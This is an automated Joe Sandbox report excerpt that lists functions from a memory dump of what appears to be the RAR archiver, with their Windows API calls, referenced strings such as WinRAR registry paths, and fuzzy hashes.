Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID:
String ID: %s%s $.ext$exe$rar$sfx$,6$BK$q:
API String ID: 0-1660254149
Opcode ID: ea2d57dfe965d8c2fab16aedae0a9ba2e2116d986d5da6652a9342f8451bbd18
Instruction ID: f78d174bdde275872e4b78d39b33b09b9b77a58825d977b0d5ef6d4bd3ad5e95
Opcode Fuzzy Hash: ea2d57dfe965d8c2fab16aedae0a9ba2e2116d986d5da6652a9342f8451bbd18
Instruction Fuzzy Hash: E0E2B126A09AC285EF30EF25DC401FD27A1FB85B88F454136EA4D97BA6DF39D944D302

Function 00007FF6256F48CC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6256F4AE0: FreeLibrary.KERNEL32(?,?,00000000,00007FF6256CCC90), ref: 00007FF6256F4AF5

GetModuleFileNameW.KERNEL32(?,?,?,00007FF6256E7E7D), ref: 00007FF6256F492E
GetVersionExW.KERNEL32(?,?,?,00007FF6256E7E7D), ref: 00007FF6256F496A
LoadLibraryExW.KERNELBASE(?,?,?,00007FF6256E7E7D), ref: 00007FF6256F4993
LoadLibraryW.KERNEL32(?,?,?,00007FF6256E7E7D), ref: 00007FF6256F499F

Strings

rarlng.dll, xrefs: 00007FF6256F493A

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: Library$Load$FileFreeModuleNameVersion
String ID: rarlng.dll
API String ID: 2520153904-1675521814
Opcode ID: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
Instruction ID: f38f8ee345829fd97db8587b964d0b60a439398bfc66831b09fdb30dd7e2a53e
Opcode Fuzzy Hash: 4ea004210bc8b62a292722e0c73661c8a5f08de7266e224b8a6e63eb6450ac69
Instruction Fuzzy Hash: 7A312E31B18A428AFF749F21EC412E92365FB45B85F804035EA4E82EA8DF3DE955D742

Function 00007FF6256D46EC Relevance: 7.6, APIs: 5, Instructions: 99
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,00000000,?,?,00007FF6256D4620,?,00000000,?,00007FF6256F7A8C), ref: 00007FF6256D4736
FindFirstFileW.KERNEL32(?,00000000,?,?,00007FF6256D4620,?,00000000,?,00007FF6256F7A8C), ref: 00007FF6256D476B
GetLastError.KERNEL32(?,00000000,?,?,00007FF6256D4620,?,00000000,?,00007FF6256F7A8C), ref: 00007FF6256D477A
FindNextFileW.KERNELBASE(?,?,00000000,?,?,00007FF6256D4620,?,00000000,?,00007FF6256F7A8C), ref: 00007FF6256D47A4
GetLastError.KERNEL32(?,00000000,?,?,00007FF6256D4620,?,00000000,?,00007FF6256F7A8C), ref: 00007FF6256D47B2

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
Instruction ID: bb8c7529caff9dd4caea1bd65560456c472867a8de510d7e15c15273a8413925
Opcode Fuzzy Hash: db65eb08b1281c8d58974f0f5f4a9386b8e365cfc9a754ba939093b9379e8a24
Instruction Fuzzy Hash: D241C332B0968156EE789F25E8402E863A0FB49FB4F400731EA7D83BD5DF6CE9558701

Function 00007FF6256C901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32 ref: 00007FF6256C904D
CryptGenRandom.ADVAPI32 ref: 00007FF6256C9061
CryptReleaseContext.ADVAPI32 ref: 00007FF6256C9074

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
Instruction ID: 982dd9b8055b984cf9df29d8fbdd2606bd0fe9324e0d81119642be154d22b743
Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
Instruction Fuzzy Hash: 2C016D2AB4865082FF208F16A8443396761FBC4FD0F198035DE4D83BA8DF7DD9468705

Function 00007FF6256BB540 Relevance: 2.0, APIs: 1, Instructions: 490COMMON

Download Yara Rule

APIs

CharToOemA.USER32 ref: 00007FF6256BB900

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: Char
String ID:
API String ID: 751630497-0
Opcode ID: 4a270d81eb8ab39873b6764aae3297a856c8880cd76c259fb5395090f733754a
Instruction ID: 639024b886b643090ed2803526a9e0a130d4aa49885d7bfc0e7596e8cd2a0718
Opcode Fuzzy Hash: 4a270d81eb8ab39873b6764aae3297a856c8880cd76c259fb5395090f733754a
Instruction Fuzzy Hash: 9022A232A0868296EF24EF30D8411FE7BA1FB50B58F444035EA8DA76B9DE78ED41D741

Function 00007FF6256DAE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF6256DB0C7

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64e19a6c149fbf3ce18041e807eec97dd4e785c068965673d4e096d45633b1e4
Instruction ID: 7bb26cb0565ffa9a8c33271a77ffac54741ac8a754a93abc46503114c6226830
Opcode Fuzzy Hash: 64e19a6c149fbf3ce18041e807eec97dd4e785c068965673d4e096d45633b1e4
Instruction Fuzzy Hash: 70711232A0668186DB54DF29E8053EC33D1FB88F98F144136DB5DCB3A9DF79A8418791

Function 00007FF6256F3EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcschr.LIBVCRUNTIME ref: 00007FF6256F3EF9
GetModuleFileNameW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6256F3E8F,?,00007FF6256E7E90), ref: 00007FF6256F3F14
snprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6256F43C6

Strings

@%s:, xrefs: 00007FF6256F43A5
RTL, xrefs: 00007FF6256F437A
*messages***, xrefs: 00007FF6256F4080
DIRECTION, xrefs: 00007FF6256F4243
STRINGS, xrefs: 00007FF6256F4219
DIALOG, xrefs: 00007FF6256F4227
\, xrefs: 00007FF6256F4519
*messages***, xrefs: 00007FF6256F4050
$%s:, xrefs: 00007FF6256F439E
MENU, xrefs: 00007FF6256F4235
,, xrefs: 00007FF6256F43FB

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: FileModuleNamesnprintfwcschr
String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
API String ID: 602362809-1645646101
Opcode ID: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
Instruction ID: bff2ead58c9210d3512f851ce86d21b04bc14238d0c2eead534d93aaccd8a11c
Opcode Fuzzy Hash: ae8474dee3b463159ef0040d2370611761e4d5b9e5e790769e2fb30427c5b3fa
Instruction Fuzzy Hash: 86228F22E1968285EE30DF15D8506B92361FF44B84F805136EE4EC7EA9EF6DED44D302

Function 00007FF6256C4FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcschr.LIBVCRUNTIME ref: 00007FF6256C5043
wcschr.LIBVCRUNTIME ref: 00007FF6256C5129

Strings

.part, xrefs: 00007FF6256C50A5
.rar, xrefs: 00007FF6256C508E
.rar, xrefs: 00007FF6256C50E6
stdin, xrefs: 00007FF6256C52C2
FUADPXETK, xrefs: 00007FF6256C503C
AFUMD, xrefs: 00007FF6256C5122

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: wcschr
String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
API String ID: 1497570035-1281034975
Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
Instruction ID: 82075ec9830415acb0f969a3d0265b70bf024e7f3c6dc55f69f0170f91b7be51
Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
Instruction Fuzzy Hash: CDC18461A1858254EE34AF259C591FC2291FF66F86F444131E94ECA5FADF2DEE00E313

Function 00007FF6256F7F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF6256F805C

Part of subcall function 00007FF6256FB3F0: GetSystemDirectoryW.KERNEL32(00000000,00007FF6256F7F72), ref: 00007FF6256FB41E

GetProcAddressForCaller.KERNELBASE ref: 00007FF6256F7F88
GetProcAddress.KERNEL32 ref: 00007FF6256F7FA3

Strings

CryptUnprotectMemory, xrefs: 00007FF6256F7F95
CryptUnprotectMemory failed, xrefs: 00007FF6256F8053
CryptProtectMemory failed, xrefs: 00007FF6256F8009
Crypt32.dll, xrefs: 00007FF6256F7F66
CryptProtectMemory, xrefs: 00007FF6256F7F7E

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: AddressProc$CallerCurrentDirectoryProcessSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
API String ID: 1389829785-2207617598
Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
Instruction ID: e3d4a1e09534e24e030e2c2df9d04645cbdd2bea55e4f4f1492f9ec4aab6e374
Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
Instruction Fuzzy Hash: 6B415621E49A8291EE25CF16AC0053967A1BF49FE5F580135CC6EC7BA4DE3CEC429302

Function 00007FF62570B0FC Relevance: 13.6, APIs: 9, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF62570B110

Part of subcall function 00007FF62570AA8C: __isa_available_init.LIBCMT ref: 00007FF62570AAA9
Part of subcall function 00007FF62570AA8C: __vcrt_initialize.LIBVCRUNTIME ref: 00007FF62570AAAE

__scrt_fastfail.LIBCMT ref: 00007FF62570B11E

Part of subcall function 00007FF62570B52C: IsProcessorFeaturePresent.KERNEL32 ref: 00007FF62570B548
Part of subcall function 00007FF62570B52C: RtlCaptureContext.KERNEL32 ref: 00007FF62570B571
Part of subcall function 00007FF62570B52C: RtlLookupFunctionEntry.KERNEL32 ref: 00007FF62570B58B
Part of subcall function 00007FF62570B52C: RtlVirtualUnwind.KERNEL32 ref: 00007FF62570B5CC
Part of subcall function 00007FF62570B52C: IsDebuggerPresent.KERNEL32 ref: 00007FF62570B620
Part of subcall function 00007FF62570B52C: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF62570B641
Part of subcall function 00007FF62570B52C: UnhandledExceptionFilter.KERNEL32 ref: 00007FF62570B64C

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF62570B12C
__scrt_fastfail.LIBCMT ref: 00007FF62570B143
__scrt_release_startup_lock.LIBCMT ref: 00007FF62570B1A0
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF62570B1B6
__scrt_is_nonwritable_in_current_image.LIBCMT ref: 00007FF62570B1E6
__scrt_is_managed_app.LIBCMT ref: 00007FF62570B21B
__scrt_uninitialize_crt.LIBCMT ref: 00007FF62570B239

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
String ID:
API String ID: 552178382-0
Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
Instruction ID: a93104288e51691ed501797b324fecf8101605e357fe7f9a2d555ec997f1f599
Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
Instruction Fuzzy Hash: 4C313D21E8824385FE34AF26AC617BD13D2AF55F84F444036EA4DC76D7EE2EED048652

Function 00007FF6256F4774 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF6256F495D,?,?,?,00007FF6256E7E7D), ref: 00007FF6256F47DB
RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF6256F495D,?,?,?,00007FF6256E7E7D), ref: 00007FF6256F4831
ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF6256F495D,?,?,?,00007FF6256E7E7D), ref: 00007FF6256F4853
RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF6256F495D,?,?,?,00007FF6256E7E7D), ref: 00007FF6256F48A6

Strings

LanguageFolder, xrefs: 00007FF6256F4806
Software\WinRAR\General, xrefs: 00007FF6256F47CD

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: CloseEnvironmentExpandOpenQueryStringsValue
String ID: LanguageFolder$Software\WinRAR\General
API String ID: 1800380464-3408810217
Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
Instruction ID: 8aa0517a99ffd07d0d627ce4fb78cb8ae7bb649de8329dafec2010cb483f5f9d
Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
Instruction Fuzzy Hash: 75318022B28A8145EE709F21EC406BA6351FF84B94F405231EE4E87FA9EE6CD944C701

Function 00007FF6256E4398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256E43D1
RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256E4402
RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256E440D
GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF6256E38CB,?,?,?,00007FF6256E41EC), ref: 00007FF6256E443E

Strings

Software\WinRAR\Paths, xrefs: 00007FF6256E43BC
AppData, xrefs: 00007FF6256E43F7

Memory Dump Source

Source File: 00000067.00000002.1630933048.00007FF6256B1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6256B0000, based on PE: true

Associated: 00000067.00000002.1630894687.00007FF6256B0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631007312.00007FF625720000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631054167.00007FF625738000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631090552.00007FF625739000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62573A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625744000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF62574E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631126320.00007FF625756000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631285235.00007FF625758000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.1631327321.00007FF62575E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6256b0000_rar.jbxd

Similarity

API ID: CloseFileModuleNameOpenQueryValue
String ID: AppData$Software\WinRAR\Paths
API String ID: 3617018055-3415417297
Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction ID: 42dc30db8455db211e47453d275f8ee05b3cbc68b99d0242f3b81d5b94a47809
Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
Instruction Fuzzy Hash: A3115122A1974185EE319F26AC009B9B360FF88FC5F445131EA4E87A69EF3CD804D702

Function 00007FF6256B7A5B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

H9, xrefs: 00007FF6256B7BF3

